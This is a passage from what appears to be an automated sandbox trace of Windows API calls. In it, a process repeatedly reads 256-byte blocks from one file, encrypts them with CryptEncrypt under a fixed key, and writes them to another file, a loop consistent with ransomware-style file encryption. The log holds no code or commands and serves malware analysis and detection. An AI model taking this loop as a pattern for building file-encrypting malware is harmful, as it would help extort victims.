pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.042] GetLastError () returned 0x0 [0172.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.042] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.042] GetLastError () returned 0x0 [0172.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.042] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.042] GetLastError () returned 0x0 [0172.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.042] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.042] GetLastError () returned 0x0 [0172.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.042] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.042] GetLastError () returned 0x0 [0172.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.042] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.042] GetLastError () returned 0x0 [0172.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.043] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.043] GetLastError () returned 0x0 [0172.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.043] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.043] GetLastError () returned 0x0 [0172.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.043] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.043] GetLastError () returned 0x0 [0172.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.043] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.043] GetLastError () returned 0x0 [0172.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.043] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.043] GetLastError () returned 0x0 [0172.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.043] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.043] GetLastError () returned 0x0 [0172.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.044] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.044] GetLastError () returned 0x0 [0172.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.044] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.044] GetLastError () returned 0x0 [0172.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.044] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.044] GetLastError () returned 0x0 [0172.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.044] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.044] GetLastError () returned 0x0 [0172.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.044] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.044] GetLastError () returned 0x0 [0172.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.044] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.044] GetLastError () returned 0x0 [0172.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.044] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.044] GetLastError () returned 0x0 [0172.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.045] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.045] GetLastError () returned 0x0 [0172.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.045] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.045] GetLastError () returned 0x0 [0172.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.045] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.045] GetLastError () returned 0x0 [0172.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.045] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.045] GetLastError () returned 0x0 [0172.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.045] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.045] GetLastError () returned 0x0 [0172.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.045] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.045] GetLastError () returned 0x0 [0172.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.046] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.046] GetLastError () returned 0x0 [0172.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.046] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.046] GetLastError () returned 0x0 [0172.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.046] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.046] GetLastError () returned 0x0 [0172.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.046] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.046] GetLastError () returned 0x0 [0172.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.046] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.046] GetLastError () returned 0x0 [0172.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.046] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.046] GetLastError () returned 0x0 [0172.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.047] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.047] GetLastError () returned 0x0 [0172.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, 